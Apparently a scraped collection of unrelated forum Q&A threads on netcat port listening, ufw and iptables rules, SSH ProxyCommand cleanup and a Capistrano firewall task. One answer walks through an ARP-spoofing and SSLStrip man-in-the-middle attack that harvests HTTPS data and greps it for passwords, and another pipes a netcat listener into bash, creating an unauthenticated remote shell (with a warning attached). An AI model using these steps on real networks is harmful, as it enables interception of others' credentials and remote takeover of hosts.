Can't you listen on a port range with netcat? You can scan a range, but not listen it appears. So only solution is scripting?
I know this post is old, but I recently found a decent solution for this in the form of a nice one-liner.
Shell = bash, OS = Redhat 7.
for j in 202{0..5}; do nc -lvnp $j & done
This should open up a number of listening ports from 2020 to 2025, or whatever range you want.
If you are not a root user but a sudoer and have to listen to ports below 1024 add sudo before nc command.
for j in 101{0..5}; do sudo nc -lvnp $j & done
Edited : n/c: The local port parameter was missing. {-p}
I don't think it supports that functionality. If you are happy with any old solution, you could use the ncat edtition of netcat, and set up forwarding for each port. You can spawn a forwarder for all but the first port, then listen on the first port:
first_port=2999
last_port=3004
for (( i = first_port+1; i <= last_port; i++ )) do
ncat -l -k -p $i -c "nc localhost $last_port" &
done
ncat -l -k -p $first_port
I admit, it's grungey.
If you are looking to scan your destination through multiple local ports, you can use the -p <PORT> option[1]. That tells netcat to look through that local port, much similar to when telling it to setup a backdoor listener on said port. You can also string a bunch of those ports together if they are split up. Here is an example I just used.
$ nc -vvz -p 80 -p 8080 -p 443 testserver.mycompany.com 3066
That did my trick. Of course you can also list multiple destination ports to make it scan those also through each of your local ports.
[1] http://www.instructables.com/id/More-Fun-with-netcat/step2/Basic-Netcat-commands/
or iptables,
iptables -t nat -A INPUT -p tcp --dport 8080 -j REDIRECT --to-port 80
Related
Written program in python, which chooses random port available for TCP and UDP communication. If I enable Linux firewall(ufw) by running sudo ufw enable. where we can allow any port by giving
sudo ufw allow port_number. As the program can take any random port on run, so can not tell ufw to allow any particular port. Is there any way to tell ufw to allow prog to access any random port by supplying program name to ufw like in windows. In windows firewall, we can supply the following command to allow access to all port for myprog
netsh advfirewall firewall add rule name=rule_name_udp dir=in action=allow protocol=UDP localport=any program=path/myprog.exe
is there any way to allow ufw for my custom program to access for udp/tcp communication with ufw enable?
Thanks to all in advance.
You can wrap your app into systemd service and use post-start hook to call extra bash script which punches holes in firewall.
/path/to/python/app/assistant-ufw-hole-puncher
#!/bin/bash
#extra sleep for prespawn script
sleep 2
#punch holes for TCP ports
ports=`sudo netstat -ntlp 2>&1 |grep yourapp | sed -r 's/(.*:)([0-9]*)(\s.*)/\2/'|sort|uniq`
for port in $ports ; do
sudo ufw allow $port
done
#punch holes for UDP ports
ports=`sudo netstat -nulp 2>&1 |grep yourapp | sed -r 's/(.*:)([0-9]*)(\s.*)/\2/'|sort|uniq`
for port in $ports ; do
sudo ufw allow $port
done
Also you could spawn this script before starting your script but you would need to add extra sleep to wait for python script to start.
#!/bin/bash
/path/to/python/app/assistant-ufw-hole-puncher &
python ./your-app.py
i am using Backtrack5 for this ..but am stuck ...i am not able to get the data i want, i am using Ettercap and SSL Strip for this...
Does any one here any idea of how to do it ?
Idk how you're doing it, but for me ettercap-gtk (the gui) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and go another route.
Let me give you some steps, starting with setting up your iptables for this attack (Man in the middle, amirite) and enabling ip_forward(ing)
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)
Now to be the man in the middle: Here we use arpspoof:
arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)
Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)
cat filename(from earlier) and even pipe | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will be filling up with captured/stripped https data.
I have a webserver WWW1 and a front-facing proxy PRX. I use SSH ProxyCommand to connect to WWW1's internal IP (private IP) via PRX (private+public IP). For some connections (not all) I see a network connection left open after I'm finished. These add up!
~/.ssh/config
Host *
ServerAliveInterval 5
ControlMaster auto
ControlPath ~/.ssh/master-%r#%h:%p
Host WWW1 WWW2 WWW3
User foo
ProxyCommand ssh -q -a -x PRX nc %h 22
IdentityFile ~/.ssh/id_foo_WWWx
On PRX, lsof | grep WWW1:ssh shows 124 open connections at the moment. On WWW1, the same command shows 243 open connections. There are similar open connections for WWW2, WWW3 etc.
WWW1 and PRX are Debian. Client connections are coming from a mix of Debian, Ubuntu and OSX10.6. I use Emacs Tramp but this has no special configuration (AFAIK) outside of my ~/.ssh/config.
I'm concerned about running out of internal ports, and ideally I want these connections to clean themselves up without intervention. Ideally by configuring them to kill themselves off; failing that a command I can kill old processes with is fine!
A better way would be to use the -W option of SSH, so you could put
ProxyCommand ssh -q -a -x PRX -W %h:22
instead of
ProxyCommand ssh -q -a -x PRX nc %h 22
This way you get rid of dependence on nc too.
Don't know whether it matters but I use nc -w 1 %h %p
Is there a way to quickly bind to a TCP port/ip address and simply print out all information to STDOUT? I have a simple debugging solution which writes things to 127.0.0.1:4444 and I'd like to be able to simply bind up a port from bash and print everything that comes across. Is there an easy way to do this?
$ nc -k -l 4444 > filename.out
see nc(1)
Just because you asked how to do it in bash, though netcat answer is very valid:
$ exec 3<>/dev/tcp/127.0.0.1/4444
$ cat <&3
That is working as you expecting:
nc -k -l 4444 |bash
and then you
echo "ls" >/dev/tcp/127.0.0.1/4444
then you see the listing performed by bash.
[A Brief Security Warning]
Of course if you leave a thing like this running on your computer, you have a wide open gateway for all kinds of attacks because commands can be sent from any user account on any host in your network. This implements no security (authentication, identification) whatsoever and sends all transmitted commands unencrypted over the network, so it can very easily be abused.
Adding an answer using ncat that #Freedom_Ben alluded to:
ncat -k -l 127.0.0.1 4444
and explanation of options from man ncat:
-k, --keep-open Accept multiple connections in listen mode
-l, --listen Bind and listen for incoming connections
I'm trying to remotely open a port in a iptables firewall using Capistrano. Here's my task:
desc "Open up a port in the firewall"
task :open_port, :roles => :all do
port = variables[:port] || nil
if (!port)
puts "You must specify the port number"
next
end
run "#{sudo} /sbin/iptables -I RH-Firewall-1-INPUT 1 -p tcp --dport #{port.to_s} -j ACCEPT"
run "#{sudo} /sbin/service iptables save"
run "#{sudo} /etc/init.d/iptables restart"
end
The problem is that the first command in the task locks up. I've tried running this rule using a variety of port numbers and target machines, always with the same result.
I've got literally many dozens of other rules that look much like this but that work fine. In fact, I've got a similar task where the first command is a call to iptables to create a port mapping and that task works just fine.
What's more, I can successfully run this command on the Capistrano host:
ssh -l deployer core sudo /sbin/iptables -I RH-Firewall-1-INPUT 1 -p tcp --dport 2424 -j ACCEPT
This works fine. This should be exactly what Capistrano is attempting to do.
Why is this command locking up Capistrano?
TIA for a solution or any clue whatsoever.
Have Fun All!!!
Figured this one out myself the other day. The problem was that I was using the name 'port' as the parameter to my task. The 'parameter' port is recognized by the 'run' command, and causes the system to try to connect to the target machine via that port rather than the normal ssh port. Hence the lockup.
I changed my parameter name to 'dport', and the task started working as I expected.